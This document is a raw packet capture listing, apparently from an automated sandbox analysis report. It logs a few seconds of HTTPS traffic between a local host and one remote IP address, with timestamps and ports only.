                              Oct 2, 2024 05:29:44.584552050 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.650053978 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.650079012 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.650177002 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.650213003 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.650254011 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.650873899 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.650892019 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.650938988 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.650953054 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.650974035 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.650989056 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.716885090 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.716921091 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.717067957 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.717096090 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.717135906 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.717273951 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.717293978 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.717328072 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.717334986 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.717381001 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.717397928 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.783337116 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.783379078 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.783472061 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.783494949 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.783509970 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.783545017 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.783803940 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.783826113 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.783857107 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.783863068 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.783888102 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.783909082 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.849972963 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.850012064 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.850125074 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.850143909 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.850184917 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.850435972 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.850466967 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.850495100 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.850502014 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.850524902 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.850545883 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.887351036 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.887379885 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.887470007 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.887495995 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.887541056 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.916874886 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.916898012 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.916966915 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.916982889 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.917026043 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.917726994 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.917743921 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.917785883 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.917793036 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.917815924 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.917830944 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.992136002 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.992180109 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.992255926 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.992285013 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.992300034 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.992328882 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.992522955 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.992548943 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.992583990 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.992592096 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:44.992613077 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:44.992634058 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.049118042 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.049148083 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.049283981 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.049309969 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.049346924 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.049765110 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.049784899 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.049844980 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.049853086 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.049885988 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.115767956 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.115801096 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.115916967 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.115927935 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.115943909 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.115981102 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.115986109 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.116024971 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.116038084 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.116174936 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.116542101 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.116569042 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.116597891 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.116607904 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.116631985 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.116650105 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.182071924 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.182097912 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.182245970 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.182276964 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.182342052 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.182897091 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.182913065 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.182960033 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.182971954 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.183006048 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.248833895 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.248863935 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.248965025 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.248997927 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.249037027 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.249399900 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.249417067 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.249460936 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.249469995 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.249496937 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.249526024 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.250158072 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.250181913 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.250236034 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.250247955 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.250262976 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.250283957 CEST49705443192.168.2.11207.241.227.240
                              Oct 2, 2024 05:29:45.315567970 CEST44349705207.241.227.240192.168.2.11
                              Oct 2, 2024 05:29:45.315591097 CEST44349705207.241.227.240192.168.2.11
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 2, 2024 05:29:45.315716028 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.315746069 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.315799952 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.316265106 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.316281080 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.316329002 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.316338062 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.316374063 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.381721973 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.381737947 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.381922007 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.381942987 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.381999969 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.382105112 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.382123947 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.382184029 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.382191896 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.382205963 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.382229090 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.382920980 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.382936001 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.382978916 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.382986069 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.383008003 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.383021116 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.514972925 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.514996052 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.515221119 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.515248060 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.515299082 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.515455961 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.515475035 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.515531063 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.515544891 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.515584946 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.519452095 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.519469023 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.519515038 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.519521952 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.519551992 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.519565105 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.519613028 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.519628048 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.519681931 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.519689083 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.519726038 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.581527948 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.581546068 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.581672907 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.581688881 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.581744909 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.582354069 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.582374096 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.582551003 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.582557917 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.582602978 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.649049044 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.649066925 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.649171114 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.649184942 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.649219036 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.649878979 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.649895906 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.649945974 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.649952888 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.649980068 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.650003910 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.715069056 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.715109110 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.715215921 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.715239048 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.715260029 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.715275049 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.716243982 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.716267109 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.716303110 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.716310978 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.716334105 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.716355085 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.780811071 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.780827999 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.780956984 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.780981064 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.781028986 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.781527996 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.781543016 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.781595945 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.781603098 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.781641006 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.847248077 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.847266912 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.847393036 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.847413063 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.847465992 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.848078966 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.848093987 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.848157883 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.848165989 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.848203897 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.914395094 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.914424896 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.914493084 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.914535046 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.914555073 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.914587975 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.914601088 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.914611101 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.914622068 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.914661884 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.980295897 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.980334044 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.980380058 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.980416059 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.980436087 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.980453014 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.980704069 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.980729103 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.980896950 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:45.980921984 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:45.980962038 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.017841101 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.017859936 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.017972946 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.018007040 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.018048048 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.047080994 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.047099113 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.047230005 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.047286034 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.047332048 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.047830105 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.047847033 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.047915936 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.047931910 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.047971964 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.113344908 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.113370895 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.113441944 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.113485098 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.113507986 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.113527060 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.114144087 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.114161968 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.114208937 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.114227057 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.114239931 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.114259958 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.180002928 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.180031061 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.180169106 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.180208921 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.180268049 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.180493116 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.180509090 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.180562019 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.180572033 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.180609941 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.224140882 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.224167109 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.224308968 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.224342108 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.224386930 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.246984005 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.247040987 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.247241020 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.247277975 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.247329950 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.247586012 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.247625113 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.247657061 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.247663975 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.247736931 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.472117901 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472145081 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472275019 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.472291946 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472341061 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.472372055 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472398996 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472424984 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.472430944 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472472906 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.472901106 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472917080 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.472981930 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.472990036 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.473027945 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.477016926 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.477057934 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.477092981 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.477099895 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.477118015 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.477138996 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.477857113 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.477881908 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.477916956 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.477924109 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.477952003 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.477972984 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.478437901 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.478466034 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.478497982 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.478514910 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.478528023 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.478554010 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.513201952 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.513223886 CEST  443          49705      207.241.227.240  192.168.2.11
Oct 2, 2024 05:29:46.513319016 CEST  49705        443        192.168.2.11     207.241.227.240
Oct 2, 2024 05:29:46.513345957 CEST  443          49705      207.241.227.240  192.168.2.11
